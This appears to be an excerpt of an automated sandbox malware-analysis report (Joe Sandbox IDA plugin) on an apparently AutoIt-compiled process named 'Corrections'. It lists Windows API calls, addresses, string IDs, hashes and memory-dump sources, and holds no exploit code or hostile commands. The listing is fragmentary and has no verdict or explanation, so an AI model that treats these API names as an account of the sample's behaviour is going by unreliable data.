                                                                                                                                                                                                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                            • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                                            • Opcode ID: 36260af7ee89015114a2c663edcc98ac9a61f4484e15887484565c50116ece34
                                                                                                                                                                                                                                                                                            • Instruction ID: a2a26b1855357f8b7f6e2948f42df7da69bea1c5e5738814d5f96a47415b7249
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36260af7ee89015114a2c663edcc98ac9a61f4484e15887484565c50116ece34
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AB18E71608311AFD714DF64CA94B9EBBE5FF84320F408A1CF5999B2A1D731E844CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 009B0D81
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B0DBB
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B0E25
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B0E8D
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B0F11
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009B0F61
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009B0FA0
                                                                                                                                                                                                                                                                                              • Part of subcall function 0093FD52: _wcslen.LIBCMT ref: 0093FD5D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00982B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00982BA5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00982B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00982BD7
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                            • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                            • Opcode ID: 57bf6dc4bcca191fbccd2af3b9c27f5bdb2ae9e45b24768802b7b212166eb1c3
                                                                                                                                                                                                                                                                                            • Instruction ID: 5b67c99b3868538d01f4891b6f38955240bbdd4c8cca6e2f1399571308da1f0e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 57bf6dc4bcca191fbccd2af3b9c27f5bdb2ae9e45b24768802b7b212166eb1c3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26E19E712083418FC714EF28CA519ABB3E6BFD9324B54496CF49A9B3A1DB30ED45CB91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009225F8
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00922600
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0092262B
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00922633
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00922658
                                                                                                                                                                                                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00922675
                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00922685
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 009226B8
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 009226CC
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 009226EA
                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00922706
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00922711
                                                                                                                                                                                                                                                                                              • Part of subcall function 009219CD: GetCursorPos.USER32(?), ref: 009219E1
                                                                                                                                                                                                                                                                                              • Part of subcall function 009219CD: ScreenToClient.USER32(00000000,?), ref: 009219FE
                                                                                                                                                                                                                                                                                              • Part of subcall function 009219CD: GetAsyncKeyState.USER32(00000001), ref: 00921A23
                                                                                                                                                                                                                                                                                              • Part of subcall function 009219CD: GetAsyncKeyState.USER32(00000002), ref: 00921A3D
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,0092199C), ref: 00922738
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                            • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                                            • Opcode ID: c2e8e2b26430d628915470a8774c591873940e1574442955268534e5a583d622
                                                                                                                                                                                                                                                                                            • Instruction ID: eeb53b5f7112ecf8ad2cb91bf646da190c587912dc5adc3c6eb6c32484301b13
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2e8e2b26430d628915470a8774c591873940e1574442955268534e5a583d622
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BB18E35A15209EFDB14DFA8DD45BAE7BB4FB48324F108229FA05A7294DBB4E840DF50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00981A60
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A6C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A7B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A82
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00981A99
                                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00981741
                                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00981775
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 0098178C
                                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 009817C6
                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009817E2
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 009817F9
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00981801
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00981808
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00981829
                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00981830
                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0098185F
                                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00981881
                                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00981893
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009818BA
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 009818C1
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009818CA
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 009818D1
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009818DA
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 009818E1
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 009818ED
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 009818F4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981ADF: GetProcessHeap.KERNEL32(00000008,009814FD,?,00000000,?,009814FD,?), ref: 00981AED
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,009814FD,?), ref: 00981AF4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009814FD,?), ref: 00981B03
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8326aa1456dc499a811c66682f895519aec70e6f1c47f4edcee83001bac8341a
                                                                                                                                                                                                                                                                                            • Instruction ID: 58dbda2bf6dd1e62ca6553b6bf2b6b2deda750182bb4c75e1360d540739ade07
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8326aa1456dc499a811c66682f895519aec70e6f1c47f4edcee83001bac8341a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65714EB2D0520AABDF10EFA5ED45FAEBBBCBF44310F144225F915A6290E7319906CB61
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009ACF1D
                                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,009BDCD0,00000000,?,00000000,?,?), ref: 009ACFA4
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 009AD004
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009AD054
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009AD0CF
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 009AD112
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 009AD221
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 009AD2AD
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 009AD2E1
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 009AD2EE
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 009AD3C0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                            • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                            • Opcode ID: 82bea7549ba09d4cb303c72a37ef5f9aeefd1f9229f4e57ef7b80725cf019f6f
                                                                                                                                                                                                                                                                                            • Instruction ID: b741d8a86039a2d7d44067e583f262ee649323478f53a40061f06aa4a75bf459
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82bea7549ba09d4cb303c72a37ef5f9aeefd1f9229f4e57ef7b80725cf019f6f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF126775604211AFCB14EF14C885B2AB7E5FF89714F05889CF89A9B3A2DB31ED41CB81
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 009B1462
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B149D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009B14F0
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B1526
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B15A2
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B161D
                                                                                                                                                                                                                                                                                              • Part of subcall function 0093FD52: _wcslen.LIBCMT ref: 0093FD5D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00983535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00983547
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                            • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                            • Opcode ID: 98a784740f580e21be2e43763269fd33058d85fcf03e6727a4ce19b38ce9b341
                                                                                                                                                                                                                                                                                            • Instruction ID: f4a8342166b6ae1b99e454b8a1f91c8e71ae28c97f93a863cad562ad0c7db471
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98a784740f580e21be2e43763269fd33058d85fcf03e6727a4ce19b38ce9b341
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EE1AE316083418FC714EF24C6609AAB7E6BFD8324F54895CF8969B3A2DB30ED45CB81
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                            • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                            • Opcode ID: ff5dbd5b3023285c71a8e866f67ac3bfc47a7ce93e9c03f9f34a4b7fa55397b8
                                                                                                                                                                                                                                                                                            • Instruction ID: ab5cdee97bacc74c552d67b80e971aa5209811e3bb3cc595e93d49c1c65e7654
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff5dbd5b3023285c71a8e866f67ac3bfc47a7ce93e9c03f9f34a4b7fa55397b8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7711672A0212A8BCB209E78CD406FF33D9AFA6754B250524F86B97698EB35DD44C7D0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B8DB5
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B8DC9
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B8DEC
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B8E0F
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009B8E4D
                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009B6691), ref: 009B8EA9
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009B8EE2
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009B8F25
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009B8F5C
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 009B8F68
                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009B8F78
                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?,009B6691), ref: 009B8F87
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 009B8FA4
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 009B8FB0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                            • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                            • Opcode ID: c2d1f9123d37d022a35bbcdb40766080cf9e13be9524cdaf647a3df583104efe
                                                                                                                                                                                                                                                                                            • Instruction ID: 8499bc83f647794f9fbe9767bed3136e27daf55ba7e0094d015a2401a8e4e15c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2d1f9123d37d022a35bbcdb40766080cf9e13be9524cdaf647a3df583104efe
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF61DF71910219BAEB149F64DD85FFF77ACAF08B20F104606F815D61D1EFB4A980DBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 0099493D
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00994948
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0099499F
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009949DD
                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 00994A1B
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00994A63
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00994A9E
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00994ACC
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                            • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                            • Opcode ID: 73ab9abbb685481c601e2ce37f1c4608695a06ab8790d17e6e6c45523840b54c
                                                                                                                                                                                                                                                                                            • Instruction ID: 64c34e15fcb23f91d5ff52e853e77cd8eb86eed25aa17061bec56f141cb6d8b9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73ab9abbb685481c601e2ce37f1c4608695a06ab8790d17e6e6c45523840b54c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9071B0725082119FCB11EF28D880E6BB7E8EF98758F10492DF89597351EB31DD46CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00986395
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009863A7
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 009863BE
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 009863D3
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 009863D9
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 009863E9
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 009863EF
                                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00986410
                                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0098642A
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00986433
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0098649A
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 009864D6
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 009864DC
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 009864E3
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0098653A
